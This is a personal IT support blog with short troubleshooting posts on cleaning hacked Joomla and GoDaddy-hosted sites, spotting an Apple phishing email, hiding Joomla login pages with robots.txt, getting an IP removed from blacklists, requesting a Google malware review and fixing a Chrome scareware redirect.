Wednesday, December 12, 2018

Joomla Site Clean Up Tools

Here is a list of “Tools of the Trade” according to Ben Martin at Sucuri Security.

  • Filezilla (FTP Client)
  • NoScript (Script Blocker)
  • VirtualBox (Virtualization Tool)
  • ublock Origin (Ad Blocker)
  • PHPMyAdmin or Adminer (Database Management)
  • User Agent Switcher
  • Support Forums (ie: https://forum.joomla.org)
  • OSSEC HIDS (Server Monitoring)
  • SSH / BASH connection

I hope this helps someone else out there…

 

Godaddy Hosted Website Attacked – PHP Files In Directories

We have a static HTML site built in 2013 that we maintain. We got a notification from Godaddy that there were malicious files in the website. I started to remove them, but wanted to see what was in them. When I opened one of the files that was 3 level into the website it was extremely complicated. It looks like part of many arrays and just pulling parts of multiple arrays. I believe the end goal is to assemble the final script. It looks like this.

Another interesting thing about this attack is the date of the file. It is from 2013. I had made a complete back of the site on 2/15/2016, but the bad files were from 2013. None of the bad files were in my back in 2016.

Nothing was solved. I removed the old files and updated the .htaccess file. I found it interesting how the date could be manipulated.

I hope this helps someone one else out there….

 

Example of a Phishing Attempt Using An Email From Apple

If often get asked why someone would attack a website. It is often for financial gain. If the attacker can get a hold of your credentials then they can impersonate you on-line. Meaning if they get your bank credentials they will have access to your bank. If they get your Apple ID credentials then the can access you Apple account and buy stuff.

I got an email from Apple today to login to my account.

In this image you can see that when I put my cursor over the hyperlink in the email it is going to “natuursteendoker.be/zooology.php”.   I see attacked websites with strange named PHP files with redirects in them. This can easily redirect a user to site ready to deliver a malicious payload or virus.  Could be a key tracker that phones home with each key stroke or screen captures every 5 seconds.

I hope this helps someone else out there….

 

joomla Forgot your username? page indexed

To get to a customer’s site I Googled it and discovered the User name and Password reset pages are being indexed by Google. They show up as some of the top results.

I quickly came across the following article that lead me to the work on the Robots.txt file and disallowing these pages.

https://forum.joomla.org/viewtopic.php?t=903096

For my site I had to add the following:

Disallow: /component/users/

Then go to Google Webmaster Tools and and Fetch the site. This will inform Google you want your site crawled again.

I hope this helps someone else out there…

Follow up…

I stumbled on this article which further refines the access.

https://moz.com/community/q/robots-txt-how-to-exclude-sub-directories-correctly

His technique:

allow: /directory/$
disallow: /directory/*

Which allows this URL:

http://www.mysite.com/directory/

But doesn’t allow the following one:

http://www.mysite.com/directory/sub-directory2/…

IP blocked by M&T Bank / mtb.com – how to unblock

We recently installed a Barracuda firewall and accidentally left “Proxy” on.  This caused our IP to used as a spam relay which got our IP put on a blacklist.  A trace route from our server to mtb.com showed the packets getting to MTB.com and stopping. We assumed it was MTB.com blocking the ip.

MTB said they get their blacklist for outside sources. They directed me to the following site were I was able to submit a request to get the IP off of the blacklist.

http://www.brightcloud.com/tools/url-ip-lookup.php

I could see that the IP was showing as suspect. I clicked on the “IP Reputation” and submitted the IP for review. I knew the proxy issue was resolved the IP should be cleared. This didn’t resolve the issue.

I discovered Barracuda has their own IP blocked. This showed our IP as not having a “poor” reputation.

http://www.barracudacentral.org/lookups/lookup-reputation

Do more searching brought me to this page.

https://www.whatismyip.com/blacklist-check/?iref=ip-lookup

There were two sites that had our IP listed. When I tried to go to mailhosts.org I get an error saying that domain is available. Blacklisted with no way to get it removed.

Looking into alternative fixes.

I hope this helps someone else out there…

 

 

The site ahead contains malware Security error – how to fix

Clients site got the following message when users got to the site.

My journey started with the host which was wrong. It was all google this time. Here are the steps to get google to review your site and take it off the blacklist.

  1. Go to https://support.google.com/chrome/answer/99020?hl=en
  2. Go down to “My site…” and click on “request a review”
  3. On this page is a video to walk you through process.
  4. Next I logged into Google Webmastertools. Clicked on Messages. Clicked on the property with the malware message. And hit “Request a review”.

  5. Lastly click “I have fixed these issues.”
  6. A window will open for you to tell Google what you did to clean the site.

  7. You will get a message “Your request was submitted successfully. Please check back later.”

I hope this helps someone else out there…

 

Google Chrome redirect – http://www.google.com/ig/redirectdomain?brand=TSND&bmod=TSND

Had a customer call in because he was on the LA Times website and clicked on a link that caused his browser to pop-up a Microsoft warning. The warning said he was infected and  needed to pay. He hit control-alt-delete and closed chrome. He restarted his machine and called us.

I opened Chrome and looked at the start page. It was set to “http://www.google.com/ig/redirectdomain?brand=TSND&bmod=TSND”.  When I put that URL into another browser it took me to just Google. I figured the rest was unecessary and reset his home page to just be “http://www.google.com”.

I downloaded a rootkit scan tool from Bleeping Computer and ran a quick scan. We also use Vipre Anit-virus. I updated the difinitions and ran a full deep scan with Vipre. Nothing else was wrong.

I hope this helps someone else out there…